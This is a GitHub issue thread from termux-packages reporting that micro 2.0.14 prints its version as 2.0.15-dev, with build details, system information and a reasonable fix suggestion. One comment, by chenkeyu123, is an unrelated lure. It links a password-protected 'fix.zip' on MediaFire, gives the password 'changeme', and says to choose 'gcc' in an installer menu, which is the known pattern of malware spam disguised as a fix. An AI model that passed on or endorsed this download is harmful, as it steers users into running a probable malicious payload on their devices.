### ISSUE TITLE
[Bug]: Version of micro 2.0.14 is set as 2.0.15-dev in executable file

### ISSUE THREAD

**Issue by niten94** [termux/termux-packages#21286]
### Problem description

The upstream and package version of `micro` package in Termux is 2.0.14 but 2.0.15-dev is printed as version set in executable file like this when `micro -version` is run:
```
Version: 2.0.15-dev
Commit hash: 04c5770
Compiled on August 28, 2024
```

The Makefile is used with building the package and the version is set with the value of `VERSION` macro, but `VERSION` is set as the string printed when [tools/build-version.go](https://github.com/zyedidia/micro/blob/v2.0.14/tools/build-version.go) is run by default. The version printed is based on a part in the output of running `git describe --tags --match 'v*'` but the part is modified if it does not match the string printed when running `git describe --tags --exact-match`.

I do not know much about how packages are built in Termux and it may take too long if I try checking the cause, so I was not able to test and check much if it is a bug related with `build-version.go`.

### What steps will reproduce the bug?

Run `micro -version`.

### What is the expected behavior?

It is expected that the version printed is 2.0.14 when `micro -version` is run.

### System information

```shell
Termux Variables:
TERMUX_APK_RELEASE=GITHUB
TERMUX_APP_PACKAGE_MANAGER=apt
TERMUX_APP_PID=24503
TERMUX_IS_DEBUGGABLE_BUILD=1
TERMUX_MAIN_PACKAGE_FORMAT=debian
TERMUX_VERSION=0.118.0
TERMUX__USER_ID=0
Packages CPU architecture:
arm
Subscribed repositories:
# sources.list
deb https://packages-cf.termux.dev/apt/termux-main/ stable main
Updatable packages:
All packages up to date
termux-tools version:
1.43.4
Android version:
9
Kernel build information:
Linux localhost 3.18.91-16526088 #1 SMP PREEMPT Tue May 25 17:17:44 KST 2021 armv8l Android
Device manufacturer:
samsung
Device model:
SM-J730G
LD Variables:
LD_LIBRARY_PATH=
LD_PRELOAD=/data/data/com.termux/files/usr/lib/libtermux-exec.so
```

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cattokomo** [comment]
I assume this will be an easy fix, simply replacing the `version.String()` with the version attached on the package.
